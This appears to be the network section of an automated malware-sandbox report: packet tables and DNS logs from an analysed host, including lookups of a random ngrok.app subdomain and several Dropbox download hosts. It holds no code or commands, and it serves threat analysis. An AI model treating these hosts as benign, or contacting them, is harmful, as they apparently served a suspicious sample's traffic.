                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.276159048 CET4434996220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.276420116 CET4434996220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.281619072 CET49962443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.281676054 CET49962443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.281682968 CET4434996220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.282068968 CET49962443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.327337027 CET4434996220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.947616100 CET4434996220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.947758913 CET4434996220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.947845936 CET49962443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.949137926 CET49962443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:34.949155092 CET4434996220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:39.902312994 CET49701443192.168.2.640.126.53.8
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:39.902517080 CET4970380192.168.2.6199.232.214.172
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:40.022696018 CET4434970140.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:40.022833109 CET49701443192.168.2.640.126.53.8
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:40.023354053 CET8049703199.232.214.172192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:40.023435116 CET4970380192.168.2.6199.232.214.172
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:45.479417086 CET49705443192.168.2.640.126.53.8
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:45.599817991 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:45.600522995 CET49705443192.168.2.640.126.53.8
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:00.313479900 CET50027443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:00.313493013 CET4435002720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:00.313569069 CET50027443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:00.314167976 CET50027443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:00.314177036 CET4435002720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:02.538295031 CET4435002720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:02.538379908 CET50027443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:02.540091038 CET50027443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:02.540097952 CET4435002720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:02.540343046 CET4435002720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:02.542013884 CET50027443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:02.542220116 CET50027443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:02.542233944 CET4435002720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:02.542367935 CET50027443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:02.587331057 CET4435002720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:03.206850052 CET4435002720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:03.206979036 CET4435002720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:03.207041979 CET50027443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:03.207125902 CET50027443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:42:03.207139015 CET4435002720.198.118.190192.168.2.6

                                                                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.788228989 CET5066953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.927073956 CET53506691.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.513823986 CET5099653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.733907938 CET53509961.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:12.232988119 CET6057253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:12.558718920 CET53605721.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:24.868016005 CET6020553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:25.191514969 CET53602051.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.062807083 CET5912953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.063765049 CET5739253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.199217081 CET53591291.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.200525045 CET53573921.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.326033115 CET6429453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.326178074 CET5393153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.737874031 CET5113153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.739356041 CET5805553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.739495993 CET6201253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.050565958 CET53580551.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.051126003 CET53511311.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.072782040 CET5326253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.072916985 CET5247653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.073781013 CET4996353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.073935986 CET6315453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.086460114 CET53620121.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.147026062 CET4972153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.147461891 CET6498053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.209369898 CET53524761.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.209521055 CET53532621.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.210288048 CET53631541.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.210400105 CET53499631.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.284162045 CET53497211.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.284600019 CET53649801.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.574937105 CET5381753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.575090885 CET5113853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.713674068 CET53538171.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.714500904 CET53511381.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.213819981 CET5541753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.510029078 CET53554171.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.682771921 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.985038996 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.398257971 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.590220928 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.698815107 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.771652937 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.771764994 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.771874905 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.771975994 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.773578882 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.774338961 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.783977985 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.904251099 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.090547085 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.090567112 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.090575933 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.090595961 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.091109991 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.091208935 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.099149942 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.117285013 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.121786118 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.122075081 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.298927069 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.405251980 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.431468010 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.486309052 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.486407995 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.486423016 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.486588955 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.488537073 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.488991976 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.493326902 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.516447067 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.524950981 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.615200996 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.804786921 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.805017948 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.805035114 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.805044889 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.807739019 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.833168030 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.835563898 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.835640907 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.836462021 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.842449903 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.844312906 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.853858948 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:35.149185896 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:35.193471909 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:36.562263966 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:36.562653065 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:36.877830982 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:36.878895044 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:36.879956961 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:36.880240917 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:38.360505104 CET6136353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:38.662571907 CET53613631.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.162728071 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.163669109 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.164745092 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.165649891 CET59200443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.477835894 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.478836060 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.478924036 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.479931116 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.480207920 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.480442047 CET44363539172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.480458975 CET44359200172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.485915899 CET63539443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:41.486409903 CET59200443192.168.2.6172.64.41.3

                                                                                                                                                                                                                                                                                                                        ICMP Packets

                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.092204094 CET192.168.2.61.1.1.1c29b(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.788228989 CET192.168.2.61.1.1.10x21daStandard query (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.513823986 CET192.168.2.61.1.1.10xd652Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:12.232988119 CET192.168.2.61.1.1.10x4cb2Standard query (0)uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:24.868016005 CET192.168.2.61.1.1.10x9ca7Standard query (0)ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.062807083 CET192.168.2.61.1.1.10x1bc1Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.063765049 CET192.168.2.61.1.1.10x74b7Standard query (0)www.dropbox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.326033115 CET192.168.2.61.1.1.10xafa3Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.326178074 CET192.168.2.61.1.1.10xac2Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.737874031 CET192.168.2.61.1.1.10x3575Standard query (0)ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.739356041 CET192.168.2.61.1.1.10x29ffStandard query (0)ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.739495993 CET192.168.2.61.1.1.10x5d1Standard query (0)ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.072782040 CET192.168.2.61.1.1.10x389bStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.072916985 CET192.168.2.61.1.1.10x3c28Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.073781013 CET192.168.2.61.1.1.10x780cStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.073935986 CET192.168.2.61.1.1.10x8c5cStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.147026062 CET192.168.2.61.1.1.10xb5f0Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.147461891 CET192.168.2.61.1.1.10x686cStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.574937105 CET192.168.2.61.1.1.10xe742Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.575090885 CET192.168.2.61.1.1.10x5f6bStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.213819981 CET192.168.2.61.1.1.10xc02Standard query (0)uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:38.360505104 CET192.168.2.61.1.1.10x9d47Standard query (0)uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.927073956 CET1.1.1.1192.168.2.60x21daNo error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.209.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.927073956 CET1.1.1.1192.168.2.60x21daNo error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.223.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.927073956 CET1.1.1.1192.168.2.60x21daNo error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app18.158.249.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.927073956 CET1.1.1.1192.168.2.60x21daNo error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app18.192.31.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.927073956 CET1.1.1.1192.168.2.60x21daNo error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.102.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.927073956 CET1.1.1.1192.168.2.60x21daNo error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.124.142.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.733907938 CET1.1.1.1192.168.2.60xd652No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.733907938 CET1.1.1.1192.168.2.60xd652No error (0)www-env.dropbox-dns.com162.125.65.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:12.558718920 CET1.1.1.1192.168.2.60x4cb2No error (0)uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:12.558718920 CET1.1.1.1192.168.2.60x4cb2No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:25.191514969 CET1.1.1.1192.168.2.60x9ca7No error (0)ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:25.191514969 CET1.1.1.1192.168.2.60x9ca7No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.199217081 CET1.1.1.1192.168.2.60x1bc1No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.199217081 CET1.1.1.1192.168.2.60x1bc1No error (0)www-env.dropbox-dns.com162.125.65.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.200525045 CET1.1.1.1192.168.2.60x74b7No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.205478907 CET1.1.1.1192.168.2.60xb4f3No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.205478907 CET1.1.1.1192.168.2.60xb4f3No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:27.205491066 CET1.1.1.1192.168.2.60xdff6No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.464096069 CET1.1.1.1192.168.2.60xac2No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:29.465203047 CET1.1.1.1192.168.2.60xafa3No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.050565958 CET1.1.1.1192.168.2.60x29ffNo error (0)ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.050565958 CET1.1.1.1192.168.2.60x29ffNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.051126003 CET1.1.1.1192.168.2.60x3575No error (0)ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.051126003 CET1.1.1.1192.168.2.60x3575No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.086460114 CET1.1.1.1192.168.2.60x5d1No error (0)ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.209369898 CET1.1.1.1192.168.2.60x3c28No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.209521055 CET1.1.1.1192.168.2.60x389bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.209521055 CET1.1.1.1192.168.2.60x389bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.210288048 CET1.1.1.1192.168.2.60x8c5cNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.210400105 CET1.1.1.1192.168.2.60x780cNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.210400105 CET1.1.1.1192.168.2.60x780cNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
